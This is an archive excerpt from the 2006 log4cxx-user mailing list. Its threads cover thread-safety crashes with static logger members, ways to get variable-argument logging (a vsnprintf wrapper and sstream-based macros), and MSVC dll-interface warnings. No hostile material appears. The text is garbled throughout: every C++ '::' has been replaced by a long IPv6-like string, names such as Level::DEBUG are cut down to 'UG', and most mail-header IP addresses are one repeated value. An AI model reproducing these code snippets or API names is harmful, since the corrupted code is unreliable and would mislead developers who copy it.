log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggingEvent> & {...}, log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bPool & {...}) line 99 + 27 bytes Any ideas? I see no problem with 2 different FileAppenders in 2 different Loggers running simultaneously, but if there's only one Converter... From [email protected] Sat Sep 16 21:15:55 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6663 invoked from network); 16 Sep 2006 21:15:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Sep 2006 21:15:55 -0000 Received: (qmail 60053 invoked by uid 500); 16 Sep 2006 21:15:55 -0000 Delivered-To: [email protected] Received: (qmail 59789 invoked by uid 500); 16 Sep 2006 21:15:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 59773 invoked by uid 99); 16 Sep 2006 21:15:54 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 16 Sep 2006 14:15:54 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO smtp109.sbc.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sat, 16 Sep 2006 14:15:53 -0700 Received: (qmail 83429 invoked from network); 16 Sep 2006 21:15:32 -0000 Received: from unknown (HELO ?161.129.204.104?) ([email protected]@161.129.204.104 with plain) by smtp109.sbc.mail.mud.yahoo.com with SMTP; 16 Sep 2006 21:15:32 -0000 Mime-Version: 1.0 (Apple Message framework v752.2) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Curt Arnold <[email protected]> Subject: Re: Thread safety problem Date: Sat, 16 Sep 2006 16:15:29 -0500 To: Log4CXX User <[email protected]> X-Mailer: Apple Mail (2.752.2) X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Could you test using log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetDebug() instead of log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUG? The static members DEBUG, INFO, etc are held over from 0.9.7 and log4j however non-local static member variables are [email protected]. I believe that DEBUG et al are marked as deprecated for that reason. I've been tempted to remove them entirely but that would probably warrant a vote to see how many people would be affected. On Sep 14, 2006, at 4:02 AM, Salvati Marc wrote: > Hello, > I m using QThread and Log4cxx in a project. I created a simple > class with static member to access logging anywhere in my soft. > But when I m accessing from another thread I have some kind of > random crash. > I tested without multithread and it work fine. > It s written in Log4cxx Faq that it s Thread safe. Am I wrong to > use class static members or is there a bug in the thread safe > functionnality? Is it problem to use QT Qthread with log4cxx? > > Thank you for any kind help. > Best regards. > > here the class declaration, initialization, and log sample. > > //my class > class Log{ > public : static log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogstream stream; > static log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggerPtr logger; > }; > > //initialization > log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggerPtr Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogger(log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetLogger("Logger")); > log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogstream Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstream(Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogger, log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUG); > > //logging sample > Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstream<<"message"<<LOG4CXX_ENDMSG; From [email protected] Sun Sep 17 18:59:32 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29448 invoked from network); 17 Sep 2006 18:59:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Sep 2006 18:59:31 -0000 Received: (qmail 41799 invoked by uid 500); 17 Sep 2006 18:59:28 -0000 Delivered-To: [email protected] Received: (qmail 41747 invoked by uid 500); 17 Sep 2006 18:59:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 41707 invoked by uid 99); 17 Sep 2006 18:59:27 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 17 Sep 2006 11:59:27 -0700 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE,HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 17 Sep 2006 11:59:18 -0700 Received: by ug-out-1314.google.com with SMTP id 36so288971ugg for <[email protected]>; Sun, 17 Sep 2006 11:58:50 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type; b=LIaIZPaqX0xinH2QSNXhKjtvkGf7024DAL94hrsj5aa5qdXjEovQ4Sn7PM0D3B7VVfa09uUzTt2435qU8AGMpipGpyFNPUnpGYwPhUUpFbILkmcVjFLj+3fqaXTFHiT4RXOPa//h7KmFgmNeTNkoK7z63sYbFiVdZ5fMAjudkjY= Received: by 161.129.204.104 with SMTP id w13mr6778910ugm; Sun, 17 Sep 2006 11:58:50 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 17 Sep 2006 11:58:49 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 18 Sep 2006 02:58:49 +0800 From: sishen <[email protected]> To: [email protected] Subject: Does log4cxx support variable-arguments? MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_330943_5746344.1158519529885" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_330943_5746344.1158519529885 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Hey. everyone. I'm a new user of log4cxx. I want to know whether log4cxx support variable argument? I have found the maillist archive, but i haven't got any answers. for example, like the macro: #define LOG4CXX_DEBUG<http://logging.apache.org/log4cxx/manual/group__LoggingMacros.html#ga1>(logger, message) it only takes two argument. And now i have to combine all argument to a string. This is not convenient. I think variable-argument is common for logging system. Any advice prefer, :) ------=_Part_330943_5746344.1158519529885 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hey. everyone.<br><br>I'm a new user of log4cxx. I want to know whether log4cxx support variable argument?<br>I have found the maillist archive, but i haven't got any answers.<br><br>for example, like the macro:<br>#define&nbsp; <a class="el" href="http://logging.apache.org/log4cxx/manual/group__LoggingMacros.html#ga1">LOG4CXX_DEBUG</a>(logger, message)<br><br>it only takes two argument.&nbsp; And now i have to combine all argument to a string. <br><br> This is not convenient. I think variable-argument is common for logging system. <br>Any advice prefer, :)<br> ------=_Part_330943_5746344.1158519529885-- From [email protected] Sun Sep 17 19:04:18 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30574 invoked from network); 17 Sep 2006 19:04:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Sep 2006 19:04:18 -0000 Received: (qmail 48576 invoked by uid 500); 17 Sep 2006 19:04:17 -0000 Delivered-To: [email protected] Received: (qmail 48309 invoked by uid 500); 17 Sep 2006 19:04:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 48298 invoked by uid 99); 17 Sep 2006 19:04:17 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 17 Sep 2006 12:04:17 -0700 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO rubixinfotech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 17 Sep 2006 12:04:07 -0700 In-Reply-To: <[email protected]> Subject: Re: [SPAM] Does log4cxx support variable-arguments? To: "Log4CXX User" <[email protected]> Message-ID: <[email protected]> Date: Sun, 17 Sep 2006 15:01:13 -0400 From: [email protected] MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Sadly, I don't think so... what we ended up doing was to modify log4cxx to support the following additional fn()'s: void debugf(const char *fmt, ...); void infof(const char *fmt, ...); void warnf(const char *fmt, ...); void errorf(const char *fmt, ...); void fatalf(const char *fmt, ...); They are each implemented as: void Loggeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bugf(const char* format, ...) { if(repository->isDisabled(Levelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUG_INT)) { return; } // Format the string va_list pvar; va_start(pvar, format); if(Levelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUG->isGreaterOrEqual(getEffectiveLevel())) { char MessageBuffer[LOG_MESSAGE_BUFF_SIZE]; vsnprintf(MessageBuffer, sizeof(MessageBuffer), format, pvar); forcedLog(FQCN, Levelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUG, MessageBuffer); } } Renny Koshy President & CEO -------------------------------------------- RUBIX Information Technologies, Inc. www.rubixinfotech.com sishen <yedingding@gmail .com> To [email protected] 09/17/2006 02:58 cc PM Subject [SPAM] Does log4cxx support Please respond to variable-arguments? "Log4CXX User" <log4cxx-user@log ging.apache.org> Hey. everyone. I'm a new user of log4cxx. I want to know whether log4cxx support variable argument? I have found the maillist archive, but i haven't got any answers. for example, like the macro: #define LOG4CXX_DEBUG(logger, message) it only takes two argument. And now i have to combine all argument to a string. This is not convenient. I think variable-argument is common for logging system. Any advice prefer, :) From [email protected] Mon Sep 18 02:57:04 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26583 invoked from network); 18 Sep 2006 02:57:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Sep 2006 02:57:04 -0000 Received: (qmail 81447 invoked by uid 500); 18 Sep 2006 02:57:03 -0000 Delivered-To: [email protected] Received: (qmail 81276 invoked by uid 500); 18 Sep 2006 02:57:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 81265 invoked by uid 99); 18 Sep 2006 02:57:02 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 17 Sep 2006 19:57:02 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO smtp108.sbc.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sun, 17 Sep 2006 19:56:52 -0700 Received: (qmail 19733 invoked from network); 18 Sep 2006 02:56:26 -0000 Received: from unknown (HELO ?161.129.204.104?) ([email protected]@161.129.204.104 with plain) by smtp108.sbc.mail.mud.yahoo.com with SMTP; 18 Sep 2006 02:56:25 -0000 Mime-Version: 1.0 (Apple Message framework v752.2) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Curt Arnold <[email protected]> Subject: Re: Does log4cxx support variable-arguments? Date: Sun, 17 Sep 2006 21:56:22 -0500 To: Log4CXX User <[email protected]> X-Mailer: Apple Mail (2.752.2) X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On Sep 17, 2006, at 1:58 PM, sishen wrote: > Hey. everyone. > > I'm a new user of log4cxx. I want to know whether log4cxx support > variable argument? > I have found the maillist archive, but i haven't got any answers. > > for example, like the macro: > #define LOG4CXX_DEBUG(logger, message) > > it only takes two argument. And now i have to combine all argument > to a string. > > This is not convenient. I think variable-argument is common for > logging system. > Any advice prefer, :) No, however the message parameter can be an expression, the expression could be a function that takes varargs or has multiple signatures. The expression is only evaluated if the threshold is satisified, so if you do something like: LOG4CXX_INFO(logger, logfmt("%s %s %d", arg1, arg2, arg3)); The logfmt method would only be called if logger's threshold level is INFO or above (where logfmt would be a method you defined that returned stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstring or stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bwstring). The LOG4CXX_INFO are preprocessor macros which handle all the details in passing the caller information to the actual logger methods. If they were not preprocessor macros the __LINE__ and __FILE__ would refer the the location of the method implementation, not the caller. As preprocessor macros, they do not have the ability to overload the macro name with multiple definitions for different argument lists. From [email protected] Mon Sep 18 06:21:00 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65987 invoked from network); 18 Sep 2006 06:21:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Sep 2006 06:21:00 -0000 Received: (qmail 77508 invoked by uid 500); 18 Sep 2006 06:20:59 -0000 Delivered-To: [email protected] Received: (qmail 77464 invoked by uid 500); 18 Sep 2006 06:20:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 77452 invoked by uid 99); 18 Sep 2006 06:20:58 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 17 Sep 2006 23:20:58 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO pecan.ugent.be) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 17 Sep 2006 23:20:29 -0700 Received: from localhost (gorilla.ugent.be [161.129.204.104]) by pecan.ugent.be (Postfix) with ESMTP id AC86C3282DC for <[email protected]>; Mon, 18 Sep 2006 07:57:31 +0200 (CEST) Received: from pecan.ugent.be ([161.129.204.104]) by localhost (gorilla.UGent.be [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id 06380-08 for <[email protected]>; Mon, 18 Sep 2006 07:57:27 +0200 (CEST) Received: from tnisoft.com (tni20.elis.UGent.be [161.129.204.104]) by pecan.ugent.be (Postfix) with ESMTP id 242E932831B for <[email protected]>; Mon, 18 Sep 2006 07:57:18 +0200 (CEST) Subject: RE: Dll-interface warnings Date: Mon, 18 Sep 2006 07:43:45 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Message-ID: <[email protected]> In-Reply-To: <[email protected]> Content-class: urn:content-classes:message X-MS-Has-Attach: X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 X-MS-TNEF-Correlator: Thread-Topic: Dll-interface warnings thread-index: AcbX2g7a4C8Y7kqLSKeZ4Se0NPqUggABdOxgAMFbwcA= From: "Merijn Vandenabeele" <[email protected]> To: "Log4CXX User" <[email protected]> X-Virus-Scanned: by UGent DICT X-Spam-Level: X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, hits=-5.287 tagged_above=-999 required=6.31 tests=ALL_TRUSTED, AWL, BAYES_00 X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Nobody knows what to do with config_msvc.h.in ??? Merijn=20 > -----Oorspronkelijk bericht----- > Van: Merijn Vandenabeele [mailto:[email protected]]=20 > Verzonden: donderdag 14 september 2006 11:29 > Aan: Log4CXX User > Onderwerp: RE: Dll-interface warnings >=20 > > -----Oorspronkelijk bericht----- > > Van: Merijn Vandenabeele [mailto:[email protected]] > > Verzonden: donderdag 14 september 2006 10:45 > > Aan: [email protected] > > Onderwerp: Dll-interface warnings > >=20 > > Hi, > >=20 > > Because version 0.9.7 of log4cxx isn't recommended, I'm=20 > building the=20 > > CVS Head following the instructions that came with the source.=20 > > Building the libs runs smooths (VS2003), but when I use the=20 > libs in my=20 > > project, I get a lot of dll-interface warnings when compiling. I=20 > > didn't get these with version 0.9.7 so I guess I'm overlooking=20 > > something? I searched the mailing list archives but found close to=20 > > nothing on this subject. > >=20 > > Can somebody help me out or should I just ignore the warnings? > >=20 > > Thanks in advance, > > Merijn > >=20 >=20 > Digging into the source, I guess config_msvc.h.in has=20 > something to do with these warnings. >=20 > #if defined(WIN32) || defined(_WIN32) > #pragma warning(disable : 4250 4251 4786 4290) #endif >=20 > However, it's not clear to me what I should do with this=20 > file. I found no references to it in any other log4cxx files. >=20 > Any hints? >=20 > Thanks in advance, > Merijn >=20 From [email protected] Mon Sep 18 07:40:30 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94358 invoked from network); 18 Sep 2006 07:40:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Sep 2006 07:40:30 -0000 Received: (qmail 92503 invoked by uid 500); 18 Sep 2006 07:40:29 -0000 Delivered-To: [email protected] Received: (qmail 92356 invoked by uid 500); 18 Sep 2006 07:40:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 92337 invoked by uid 99); 18 Sep 2006 07:40:27 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 18 Sep 2006 00:40:27 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail22.messagelabs.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 18 Sep 2006 00:39:51 -0700 X-VirusChecked: Checked X-Env-Sender: [email protected] X-Msg-Ref: server-28.tower-22.messagelabs.com!1158565158!30575746!1 X-StarScan-Version: 161.129.204.104; banners=paremus.com,-,- X-Originating-IP: [161.129.204.104] Received: (qmail 7722 invoked from network); 18 Sep 2006 07:39:18 -0000 Received: from unknown (HELO server6.paremus.com) (161.129.204.104) by server-28.tower-22.messagelabs.com with SMTP; 18 Sep 2006 07:39:18 -0000 Received: from [161.129.204.104] (82-43-136-20.cable.ubr01.newm.blueyonder.co.uk [161.129.204.104]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by server6.paremus.com (Postfix) with ESMTP id 8F29A18561 for <[email protected]>; Mon, 18 Sep 2006 08:39:16 +0100 (BST) Message-ID: <[email protected]> Date: Mon, 18 Sep 2006 08:39:11 +0100 From: Derek Baum <[email protected]> User-Agent: Mail/News 161.129.204.104 (Macintosh/20060302) MIME-Version: 1.0 To: Log4CXX User <[email protected]> Subject: Re: Does log4cxx support variable-arguments? References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Paremus-MailScanner-Information: Please contact Paremus for more information X-Paremus-MailScanner: Found to be clean X-Paremus-MailScanner-From: [email protected] X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I've defined my own logging macros that use <sstream>, for example: > #include <sstream> > > // define logging macros using streams > #define LOG_LOG(_logger_, _level_, _message_) { \ > if (_logger_->isEnabledFor(_level_)) {\ > acf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstringstream sstr;\ > sstr << _message_;\ > _logger_->forcedLog(_level_, sstr.str(), LOG4CXX_LOCATION); } } > > #define LOG_DEBUG(_logger_, _message_) LOG_LOG(_logger_, > acf:4db6:5e0b:f386:43a5:35d7:718d:3c8blog4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUG, _message_) > #define LOG_ERROR(_logger_, _message_) LOG_LOG(_logger_, > acf:4db6:5e0b:f386:43a5:35d7:718d:3c8blog4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRROR, _message_) I can then use something like this: LOG_ERROR("something nasty happened: status=" << status << ", value=" << value); This has the effect of allowing multiple arguments (although in fact the whole expression is a single macro argument). Additionally, it allows easy use of objects ostream methods, to allow them to describe their own state/value. Hope this helps, Derek Curt Arnold wrote: > > On Sep 17, 2006, at 1:58 PM, sishen wrote: > >> Hey. everyone. >> >> I'm a new user of log4cxx. I want to know whether log4cxx support >> variable argument? >> I have found the maillist archive, but i haven't got any answers. >> >> for example, like the macro: >> #define LOG4CXX_DEBUG(logger, message) >> >> it only takes two argument. And now i have to combine all argument >> to a string. >> >> This is not convenient. I think variable-argument is common for >> logging system. >> Any advice prefer, :) > > > No, however the message parameter can be an expression, the expression > could be a function that takes varargs or has multiple signatures. > The expression is only evaluated if the threshold is satisified, so if > you do something like: > > LOG4CXX_INFO(logger, logfmt("%s %s %d", arg1, arg2, arg3)); > > The logfmt method would only be called if logger's threshold level is > INFO or above (where logfmt would be a method you defined that > returned stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstring or stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bwstring). The LOG4CXX_INFO are > preprocessor macros which handle all the details in passing the caller > information to the actual logger methods. If they were not > preprocessor macros the __LINE__ and __FILE__ would refer the the > location of the method implementation, not the caller. As > preprocessor macros, they do not have the ability to overload the > macro name with multiple definitions for different argument lists. ________________________________________________________________________ The information transmitted is intended only for the person(s) or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. Paremus Limited. 107-111 Fleet Street, London EC4A 2AB. Phone number (603)363-6787 ________________________________________________________________________ From [email protected] Mon Sep 18 14:07:30 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47631 invoked from network); 18 Sep 2006 14:07:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Sep 2006 14:07:29 -0000 Received: (qmail 43084 invoked by uid 500); 18 Sep 2006 14:07:28 -0000 Delivered-To: [email protected] Received: (qmail 43059 invoked by uid 500); 18 Sep 2006 14:07:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 43048 invoked by uid 99); 18 Sep 2006 14:07:28 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 18 Sep 2006 07:07:28 -0700 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE,HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 18 Sep 2006 07:07:18 -0700 Received: by ug-out-1314.google.com with SMTP id 36so347869ugg for <[email protected]>; Mon, 18 Sep 2006 07:06:14 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=ifB1L0C3530NbpiQf0OBKJa50DsjLu14OnuNtvvs8FogOoLH1HbY8CMmA4CoMiaPGgEDjUSnoq5A0WIhHt3E9gj4zb+L9ei99qz9JV8jkPAiQad4AKVXfQb8d7eUqrnGo8Zhd5CSKDP/3VesXTS50oaw9e3UDMg1sgMW4TTrcLc= Received: by 161.129.204.104 with SMTP id z7mr7194142ugl; Mon, 18 Sep 2006 07:06:14 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 18 Sep 2006 07:06:14 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 18 Sep 2006 22:06:14 +0800 From: sishen <[email protected]> To: "Log4CXX User" <[email protected]> Subject: Re: Does log4cxx support variable-arguments? In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_343746_21362337.1158588374103" References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_343746_21362337.1158588374103 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline yeah. I prefer this way. That's what i want. Thanks all, :) On 9/18/06, Derek Baum <[email protected]> wrote: > > I've defined my own logging macros that use <sstream>, for example: > > > #include <sstream> > > > > // define logging macros using streams > > #define LOG_LOG(_logger_, _level_, _message_) { \ > > if (_logger_->isEnabledFor(_level_)) {\ > > acf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstringstream sstr;\ > > sstr << _message_;\ > > _logger_->forcedLog(_level_, sstr.str(), LOG4CXX_LOCATION); } } > > > > #define LOG_DEBUG(_logger_, _message_) LOG_LOG(_logger_, > > acf:4db6:5e0b:f386:43a5:35d7:718d:3c8blog4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUG, _message_) > > #define LOG_ERROR(_logger_, _message_) LOG_LOG(_logger_, > > acf:4db6:5e0b:f386:43a5:35d7:718d:3c8blog4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRROR, _message_) > > I can then use something like this: > > LOG_ERROR("something nasty happened: status=" << status << ", value=" << > value); > > This has the effect of allowing multiple arguments (although in fact the > whole expression is a single macro argument). > Additionally, it allows easy use of objects ostream methods, to allow > them to describe their own state/value. > > Hope this helps, > > Derek > > > Curt Arnold wrote: > > > > On Sep 17, 2006, at 1:58 PM, sishen wrote: > > > >> Hey. everyone. > >> > >> I'm a new user of log4cxx. I want to know whether log4cxx support > >> variable argument? > >> I have found the maillist archive, but i haven't got any answers. > >> > >> for example, like the macro: > >> #define LOG4CXX_DEBUG(logger, message) > >> > >> it only takes two argument. And now i have to combine all argument > >> to a string. > >> > >> This is not convenient. I think variable-argument is common for > >> logging system. > >> Any advice prefer, :) > > > > > > No, however the message parameter can be an expression, the expression > > could be a function that takes varargs or has multiple signatures. > > The expression is only evaluated if the threshold is satisified, so if > > you do something like: > > > > LOG4CXX_INFO(logger, logfmt("%s %s %d", arg1, arg2, arg3)); > > > > The logfmt method would only be called if logger's threshold level is > > INFO or above (where logfmt would be a method you defined that > > returned stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstring or stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bwstring). The LOG4CXX_INFO are > > preprocessor macros which handle all the details in passing the caller > > information to the actual logger methods. If they were not > > preprocessor macros the __LINE__ and __FILE__ would refer the the > > location of the method implementation, not the caller. As > > preprocessor macros, they do not have the ability to overload the > > macro name with multiple definitions for different argument lists. > > 